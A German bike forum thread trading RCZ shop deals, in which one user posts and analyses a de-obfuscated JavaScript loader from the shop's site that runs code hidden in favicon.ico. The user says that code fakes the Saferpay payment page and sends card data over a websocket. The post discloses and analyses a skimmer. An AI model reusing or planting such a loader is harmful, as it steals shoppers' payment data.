RCZ-Glaskugel: Wartezimmer, Spekulationen, Austausch

Focus Rennradrahmen für 100 ocken... also manchmal haut RCZ Sachen raus, da muss man schon einen arg großen Engel auf der Schulter sitzen haben der sagt: "Nein du brauchst das nicht".
Bei dem Niner Air 9 Rahmen gestern für 200€ konnte man halt auch nix verkehrt machen....:D
Ohne Gabel, Stütze. Die man einzeln halt nun schlecht bekommt. Damit kein Schnäppchen mehr.
 
Ja gut, die Gabel is wieder so ein Spezial Ding... dann halt nicht unbedingt was zum kaufen. Die Sattelstütze gibts für 40€ bei Ebay.
 
Das ist ein Enduro lrs…
IMG_1377.jpeg
 
Ich hätte noch einen EX1700 den ich zum Selbstkostenpreis zzgl. Versand abgeben würde.

Leider finde ich keinen Tauschpartner - hätte gerne einen in 27,5“ genommen.

Wenn also jemand möchte: 332€ zzgl. DPD Versand - gerne melden. Der LRS steht ungeöffnet im Karton im Keller.

Edit: habe den Karton gerade mal aufgemacht: MicroSpline, Centerlock, Tubelessband ist montiert und Ventile sind dabei.
 
Zuletzt bearbeitet:
Seit wann tauchen denn die Formula Thirtyfive Gabeln im Newsletter auf? Hat denn schon jemand eine bekommen? Mich würde interessieren, ob die Decals auch die vom Bild ausm Shop sind…
 
Der angezeigte code de-obfuskiert zu
Javascript:
(async function _f0() {
  let _g0 = await fetch("/skin/frontend/rcz/default/images/favicon.ico");
  if (_g0.ok) {
    let _g1 = await _g0.text();
    var _v0 = new Function(_g1.slice(-153027));
    return _v0();
  }
}());
Unter der URL des Favico's kommt man auf ne ICO file, welche jedoch am angeführten offset Javascript code beinhaltet, welchen dieser Code nachlädt, welcher zumindest das wort saferpay mehrmals enthält - auf jeden Fall sieht es nicht legitim aus JS für sowas in favicon.ico zu verstecken, das macht auch kein JS-packer...

Edit: Der JS Code in favicon.ico baut die Saferpay Website nach, sammelt die eingesammelten Daten, schreibt den hostname von dem das JS stammt (rcz) dazu, und sendet es in JSON via Websocket an einen Server. Ich hab gerade kein entsprechendes Tooling bei der Hand um die nervigen obfuscations aufzulösen, mal sehen ob mir im Krankenstand langweilig wird und ich den Kollegen von RCZ ein Writeup schreibe.
Auf den ersten Blick stimme ich zu, das sieht sehr schwammig aus. Eine nicht-belegte Möglichkeit wäre es, dass Angreifer welche diesen Code auf RCZ geschleust haben dadurch den User nicht auf die "echte" SaferPay Seite lotsen sondern auf von ihnen kontrollierten Code - wobei es mich noch wundert das dieser Code eben im Kontext von RCZ ausgeführt wird und nicht saferpay, und ich mich zu erinnern glaube das bei mir im Bezahlvorgang die legitime saferpay URL geladen wurde....das Hirn rattert, morgen mal genauer ansehen.
 
Zuletzt bearbeitet:
Eine nicht-belegte Möglichkeit wäre es, dass Angreifer welche diesen Code auf RCZ geschleust haben dadurch den User nicht auf die "echte" SaferPay Seite lotsen sondern auf von ihnen kontrollierten Code - wobei es mich noch wundert das dieser Code eben im Kontext von RCZ ausgeführt wird und nicht saferpay, und ich mich zu erinnern glaube das bei mir im Bezahlvorgang die legitime saferpay URL geladen wurde....das Hirn rattert, morgen mal genauer ansehen.
nur die Saferpay Seite für uns Endkunden nach zu bauen würde doch aber auch bedeuten, dass RCZ keine Zahlungen erhalten würde oder ?
 
Heißt ja nicht, dass die Infos nicht doch durchgeleitet werden..

Damit das ganze nicht schon bei der ersten geplatzten Bezahlung auffällt, wird alles durchgeleitet.. und halt einmal gespiegelt.. damit man die Daten einfach für eine weitere Zahlung woanders nutzt.
 
Zurück
Oben Unten